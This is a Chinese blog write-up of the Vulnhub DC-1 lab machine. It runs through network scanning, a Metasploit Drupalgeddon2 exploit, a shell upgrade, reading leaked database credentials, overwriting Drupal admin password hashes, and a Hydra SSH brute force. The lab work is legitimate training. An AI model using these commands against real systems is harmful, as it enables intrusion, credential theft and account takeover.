记一次Vulnhub：DC-1 靶机打靶详细步骤

Lisoning

已于 2024-09-29 18:42:55 修改

阅读量1.8k

点赞数 56

文章标签： linux 运维服务器安全

于 2024-09-29 18:41:37 首次发布

本文链接：https://blog.youkuaiyun.com/Lisoning/article/details/142639748

版权

记录一下DC-1靶机的打靶过程

靶机的下载地址：https://www.vulnhub.com/entry/dc-1-1,292/

使用VMware打开靶机，页面是经典Linux命令页面，就不做展示了。

寻找靶机IP和开放端口

打vulnhub靶机的常规思路：先设置靶机的网络连接模式为NAT模式方便后续使用工具去发现存活IP地址，查看靶机的物理地址。

然后使用kali自带的nmap扫描工具去探测同ip段内存活主机

nmap -sS 192.168.226.0/24

这里使用半开扫描，同样可以探测存活的主机以及主机开放端口。

稍等一会，查看探测的结果

有结果了，对比一下刚刚的物理地址得到靶机的IP地址：192.168.226.145 以及开放端口22、80、111.

既然已经打开kali了，那么常规信息收集的操作也一起做了。

信息收集-目录扫描

利用dirsearch扫描靶机目录

dirsearch 192.168.226.145

等结果。

可以看到有一个相当熟悉的目录/robots.txt，访问一下网站首页，直接拼接/robots.txt

192.168.226.145/robots.txt

好像也没什么有用的信息，有个/user/password目录，瞅一眼。

无语，啥也没有，转战火狐去看一眼wappalyzer有没有什么有用信息

识别到了CMS，看都看到了，那就百度，去看一下有没有什么历史漏洞。

找到了，找一篇看看大概流程学习一下。

参照这位大佬的内容去了解一下这个漏洞

https://blog.youkuaiyun.com/weixin_42742658/article/details/112479848

回归主题，既然这个CMS存在漏洞，直接利用kali自带的工具msfconsole利用一下

需要详细学习msfconsole工具的作用及用法的可以去参考这个博主，很详细

https://blog.youkuaiyun.com/weixin_45588247/article/details/119614618

利用msfconsole去查找历史漏洞

kali使用msfconsole

msfconsole

利用msfconsole去搜索一下这个CMS漏洞

search Drupal

有不少历史漏洞，那就选一个时间最近的去利用

use exploit/unix/webapp/drupal_drupalgeddon2

查看一下基本信息

show options

添加攻击的主机地址

set RHOSTS 192.168.226.145

再次show一下

可以看到，攻击主机已经加上去了，可以直接攻击了去拿shell了，run和exploit皆可。

exploit

拿到shell以及交互式shell

成功之后直接输入shell一下就能拿到shell，命令测试一下

存在文件flag1.txt文件。

测试成功了，这个shell还不太够看，传一个bash来实现交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

得到交互式shell之后查看一下flag1.txt的内容。

cat flag1.txt

啥都没呢

那就直接瞅一眼配置文件

cat `find / -name settings.php`

有一个flag2.txt文件和一个数据库的配置文件，到此我们已经获得了两个flag.txt文件

继续探索

很明显，数据库文件里有账号密码

读取数据库

使用本地或者kali去连接一下

mysql -udbuser -pR0ck3t

连接成功，去看看他数据库里有什么东西

有关于用户的内容，去看看

有三个用户的账户，包括用户名和密码，太长了，而且一看就被编码了，还得调距离去解密还不一定能解出来，怎么办呢？

改密码，改就完了。

利用数据库修改密码去登录用户

详细方法去看这篇文章：分享：忘记Drupal的管理员密码的解决办法 | Drupal China

这里就直接改了：

Drupal7加密脚本所在位置

/var/www/scripts/password-hash.sh

直接修改密码：

php /var/www/scripts/password-hash.sh 123456

记得记一下这个哈希值，一会要用

直接mysql（这里kali的话最好开两个命令执行窗口操作，不然还得退出mysql再次连接进入）中修改密码

use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

修改成功了，去他主页直接登录

登陆成功！去个人主页看看，点击功能点查看一下页面的内容发现还存在一个flag3。

看看他有啥内容

看不懂建议直接上有道翻译

大概是说需要执行命令才能了解在阴影里的文件。

既然如此，去看看/etc/passwd文件，看有没有什么东西、

发现了一个flag4，那看看/etc/shadow瞅一眼密码

...没权限

爆破密码

用九头蛇hydra工具去爆破一下密码

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.226.145

关于Hydra工具，不会使用的去学一下这位博主的文章：https://blog.youkuaiyun.com/m0_59598029/article/details/133217000

有结果了，密码是orange。

ssh连接查看内容

用ssh登陆一下

ssh flag4@192.168.226.145

就可以得到flag4的内容喽。